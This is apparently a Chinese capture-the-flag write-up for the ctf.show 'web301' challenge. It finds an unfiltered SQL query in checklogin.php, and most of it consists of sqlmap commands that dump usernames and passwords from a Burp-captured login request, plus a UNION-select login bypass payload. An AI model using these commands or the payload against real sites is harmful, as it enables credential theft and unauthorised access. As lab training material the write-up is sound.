[huayang]

该来的还是要来

分享个代码审计的工具Seay

链接: https://pan.baidu.com/s/1Bf4CzqN2Dk1NjCpnC2laXA 密码: c99g

web301

下载源码审计看看

我审nm个*****

去看看检测登录的checklogin.php文件

sql语句没有任何过滤

sqlmap跑一下

因为这里看不见注入点

所以就需要用bp抓包引入数据

复制数据保存为test.txt文件

python3 sqlmap.py -r test.txt --dbs

python3 sqlmap.py -r test.txt -D sds --tables --batch

python3 sqlmap.py -r test.txt -D sds -T sds_user  --columns --batch

python3 sqlmap.py -r test.txt -D sds -T sds_user  -C sds_password --dump --batch

python3 sqlmap.py -r test.txt -D sds -T sds_user  -C sds_username --dump --batch

当然也可以直接使用sqlmap表单查询搞下来，只不过时间有点久

python3 sqlmap.py -u http://396c27a6-b4b7-4010-880a-b51531e43147.chall.ctf.show/login.php  --forms --batch --dump

方法二

具体可参照https://hellohy.top/huayang/658.html

userid='union select'1'#&userpwd=1

[/huayang]

FROM：浅浅淡淡[hellohy]